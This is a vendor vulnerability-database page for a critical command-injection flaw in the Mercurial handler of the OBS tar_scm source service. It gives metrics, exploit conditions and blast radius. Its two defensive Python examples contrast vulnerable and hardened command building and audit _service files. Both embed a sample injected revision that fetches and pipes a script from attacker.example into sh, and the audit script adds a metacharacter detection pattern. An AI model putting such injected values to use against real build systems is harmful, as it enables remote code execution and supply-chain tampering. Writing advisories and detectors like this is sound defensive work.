HarborGuard Database

CVE-2026-56004 | Severity: CRITICAL | CNA: suse

CVE-2026-56004: obs-service-tar_scm: command injection via mercurial handler

A shell command injection in the Mercurial handler of the OBS tar_scm source service before version 0.12.4 can be used by attackers who are able to provide a _service file to execute code as the source service user, or as the local user who checks out the package and runs the malicious service.

Metrics

CVSS v3.1: 10.0
Severity: CRITICAL
Fixed in: 0.12.4
Affected products: 1


HarborGuard Analysis

Synopsis

A command injection vulnerability exists in the Mercurial (hg) handler of obs-service-tar_scm, the source service that fetches sources from SCM repositories for the openSUSE Build Service (OBS), in versions before 0.12.4. Values taken from an attacker-supplied _service file reach a shell command in the hg handler without being kept separate from it, so a crafted parameter runs arbitrary commands. The CVSS v3.1 vector rates the flaw as network-reachable with no privileges and no user interaction required; the practical precondition is that the attacker can get a _service file processed by tar_scm, either on the build service itself or on a developer's machine when a package carrying that file is checked out and its services are run. Successful exploitation gives code execution as the source service user or as the local user running the checkout, with full read, write and availability impact; the changed scope in the vector reflects that the compromised process sits inside the wider build environment rather than in an isolated component. A patched-image rebuild at version 0.12.4 is available on HarborGuard for environments running an affected version.
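The injection class described above, as an added example that is not obs-service-tar_scm's code and does not reproduce the real CVE-2026-56004 defect (the record gives no details of the vulnerable parameter): it contrasts a hypothetical hg handler that splices _service parameters into one shell string with a hardened form that builds an argv list and rejects option-like values. The parameter names url and revision, the helper names and the sample values are assumptions.

```python
"""Added example: a hypothetical shell-injection pattern in an hg handler
and its hardened counterpart. Not obs-service-tar_scm's code and not the
actual CVE-2026-56004 defect; parameter names and values are assumptions."""
import shlex
import subprocess
from typing import Dict, List, Optional

# Tokens that end one command and start another in a POSIX shell.
SHELL_SEPARATORS = {";", "&&", "||", "|", "&"}


def build_hg_command_vulnerable(params: Dict[str, str]) -> str:
    """Vulnerable pattern: _service parameters are spliced into one string
    that is later executed with shell=True, so the shell, not hg, decides
    where each argument ends."""
    rev = params.get("revision", "default")
    return f"hg clone --rev {rev} {params['url']} checkout"


def shell_commands(command_line: str) -> List[List[str]]:
    """Tokenise a string the way /bin/sh would and split it at command
    separators, to show what the vulnerable builder really hands to the
    shell. Demonstration aid only; nothing is executed."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = [[]]
    for token in lexer:
        if token in SHELL_SEPARATORS:
            commands.append([])
        else:
            commands[-1].append(token)
    return [cmd for cmd in commands if cmd]


def is_safe_parameter(value: str) -> bool:
    """Reject empty values and anything hg could parse as an option: with an
    argv list a value can no longer break out to the shell, but a value such
    as --config hooks.post-clone=... would still make hg run a command."""
    return bool(value) and not value.startswith("-")


def build_hg_command_hardened(params: Dict[str, str]) -> List[str]:
    """Hardened pattern: an argv list (never a shell), validated values, and
    "--" so that every following argument is positional for hg."""
    url = params["url"]
    rev = params.get("revision", "default")
    if not is_safe_parameter(rev):
        raise ValueError(f"revision: refusing option-like or empty value {rev!r}")
    if not is_safe_parameter(url) or not url.startswith(("https://", "http://")):
        raise ValueError(f"url: refusing {url!r} (only http(s) URLs allowed here)")
    return ["hg", "clone", "--rev", rev, "--", url, "checkout"]


def run_hardened(params: Dict[str, str]) -> Optional[int]:
    """Execute the hardened command without a shell. Returns hg's exit code,
    or None when hg is not installed (keeps the example runnable offline)."""
    argv = build_hg_command_hardened(params)
    try:
        return subprocess.run(argv, check=False).returncode
    except FileNotFoundError:
        return None


if __name__ == "__main__":
    # Constructed malicious parameters: the revision smuggles a second command.
    malicious = {"url": "https://hg.example.org/project/repo",
                 "revision": "default; curl http://attacker.example/x | sh"}
    for cmd in shell_commands(build_hg_command_vulnerable(malicious)):
        print("shell would run:", cmd)
    print("hardened argv:", build_hg_command_hardened(malicious))
```

The point of the contrast is the argument boundary: with shell=True the `;` in the revision ends the hg command and starts a new one, whereas in the argv form the same string is a single positional argument that hg merely fails to resolve. The leading-dash check matters because an argv list alone does not stop hg from interpreting an attacker-chosen value as an option.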

HarborGuard Coverage

Detection: Available

Detection of CVE-2026-56004 is available across every HarborGuard environment; the CVE is ingested from upstream feeds within minutes of publication and matched against all customer images in connected registries and CI pipelines, including custom-built images that bundle obs-service-tar_scm. Coverage applies regardless of whether the affected package was installed from an upstream base layer or added during a custom build step.

Triage: Available

HarborGuard triage for this CVE applies the CVSS v3.1 score of 10.0 (Critical) and weights it against each customer organization's compliance policy to determine urgency and routing. Alerts are directed to the appropriate team inbox within the customer org based on configured ownership rules for the affected image or workload.

Patch: Available

A patched-image rebuild at obs-service-tar_scm version 0.12.4 is available on HarborGuard for any environment where an affected image is detected. For customers who opt into auto-remediation, HarborGuard can trigger a rebuild, run regression tests against the updated image, and open a pull request against affected workloads automatically.

Exploit Conditions

  • Network reachability: Required

    The attacker must be able to get a crafted _service file to a target that runs tar_scm: a package whose services the build service executes, or a package that a user checks out and runs services on locally. No local access to the host is needed beforehand.

  • Authentication: Not required

    The CVSS vector rates privileges required as none: no credentials on the host running tar_scm are needed. What the attacker needs is a way to place the _service file where the build service or a local checkout will process it.

  • Victim interaction: Not required

    No user action is required beyond the build service, or a user's checkout, processing the attacker-supplied _service file as part of its normal operation.

  • Attack complexity: Low

    Attack complexity is low; the exploit is reliable and requires no special conditions, race timing, or knowledge of memory layout.
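A local check for the preconditions listed above, as an added example that is neither HarborGuard's nor obs-service-tar_scm's code: it compares an installed obs-service-tar_scm version against the fix version 0.12.4 and audits an OBS _service file for tar_scm/obs_scm services that select the mercurial handler and carry parameter values containing shell metacharacters or an option-like leading dash. The _service content and the metacharacter list are constructed for the example; the rpm query assumes an rpm-based host and returns None elsewhere.

```python
"""Added example, not HarborGuard's or obs-service-tar_scm's code: a local
check for the advisory's preconditions. The _service XML below is constructed
for the example; the metacharacter list is a conservative assumption."""
import re
import subprocess
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

FIXED_VERSION = "0.12.4"
# Both service names are shipped by the obs-service-tar_scm package.
SCM_SERVICES = {"tar_scm", "obs_scm"}
# Shell metacharacters, newlines, and a leading '-' (a value hg could read as an option).
SUSPICIOUS = re.compile(r"[;&|`$<>(){}\n]|^\s*-")

# Constructed _service file: one hg service with an injected revision, one
# disabled git service, and an unrelated recompress service.
SAMPLE_SERVICE = """<services>
  <service name="tar_scm">
    <param name="scm">hg</param>
    <param name="url">https://hg.example.org/project/repo</param>
    <param name="revision">default; curl http://attacker.example/x | sh</param>
  </service>
  <service name="tar_scm" mode="disabled">
    <param name="scm">git</param>
    <param name="url">https://git.example.org/project/repo.git</param>
  </service>
  <service name="recompress">
    <param name="file">*.tar</param>
    <param name="compression">xz</param>
  </service>
</services>
"""


def parse_version(version: str) -> Tuple[int, ...]:
    """Numeric tuple for comparison: '0.12.3' -> (0, 12, 3)."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def is_affected(installed: str) -> bool:
    """True when the installed obs-service-tar_scm is below the fix version."""
    return parse_version(installed) < parse_version(FIXED_VERSION)


def installed_version() -> Optional[str]:
    """Ask rpm for the installed package version (rpm-based hosts only);
    None when rpm is missing or the package is not installed."""
    try:
        proc = subprocess.run(
            ["rpm", "-q", "--qf", "%{VERSION}", "obs-service-tar_scm"],
            capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    return proc.stdout.strip() if proc.returncode == 0 else None


def audit_service_file(xml_text: str) -> List[Dict[str, str]]:
    """One finding per tar_scm/obs_scm service that selects scm=hg and has a
    parameter value matching SUSPICIOUS. The mode attribute is reported
    because a service without one runs on the build server by default."""
    findings: List[Dict[str, str]] = []
    root = ET.fromstring(xml_text)
    for service in root.findall("service"):
        name = service.get("name", "")
        if name not in SCM_SERVICES:
            continue
        params = {p.get("name", ""): (p.text or "").strip() for p in service.findall("param")}
        if params.get("scm") != "hg":
            continue
        for pname, value in params.items():
            if SUSPICIOUS.search(value):
                findings.append({"service": name, "mode": service.get("mode", "default"),
                                 "param": pname, "value": value})
    return findings


if __name__ == "__main__":
    version = installed_version()
    if version is not None:
        print(f"obs-service-tar_scm {version}: {'AFFECTED' if is_affected(version) else 'fixed'}")
    for finding in audit_service_file(SAMPLE_SERVICE):
        print("suspicious hg parameter:", finding)
```

To audit a real checkout, pass the contents of its `_service` file to `audit_service_file`. A finding is a reason to inspect the package before running its services, not proof of an exploit: a legitimate hg revision can contain none of these characters, so any hit is worth a look.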

Blast Radius

  • The attacker executes arbitrary shell commands as the obs-service-tar_scm process: the source service user on the build server, or the developer's own account when services run on a local checkout.
  • Full confidentiality impact means the attacker reads any files, credentials, or source code accessible to that user, including signing keys or repository secrets stored on the host.
  • Full integrity impact means the attacker modifies build outputs, injects backdoors into the source archives tar_scm produces, or tampers with artifacts before they are published downstream.
  • Full availability impact means the attacker crashes or disrupts the source service, blocking dependent package builds and CI pipelines that rely on it.

How HarborGuard Handles This

Available on HarborGuard: detection for CVE-2026-56004 has been active across all connected registries and pipelines since the moment the CVE was published, with images matched against the affected version range of obs-service-tar_scm (below 0.12.4). Because this is a Critical severity issue with a CVSS score of 10.0, it is prioritized at the top of triage queues under any standard compliance policy. A rebuilt image at version 0.12.4 is available for affected environments. For customers who opt into auto-remediation, HarborGuard initiates a rebuild at the fix version, executes a regression test run against the new image, and opens a pull request against affected workloads; median time from CVE publication to merged patch PR for critical-severity issues is around 90 minutes for environments with auto-remediation enabled. Where compliance policy or environment constraints prevent auto-remediation, HarborGuard surfaces the finding with remediation guidance and the exact fix version so engineering teams can act manually.


Fix available: 0.12.4

Patch commits

Affected packages
  • openSUSE / buildservice: < 0.12.4 (from 0)

CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
(network attack vector, low complexity, no privileges, no user interaction, changed scope, high confidentiality, integrity and availability impact)

References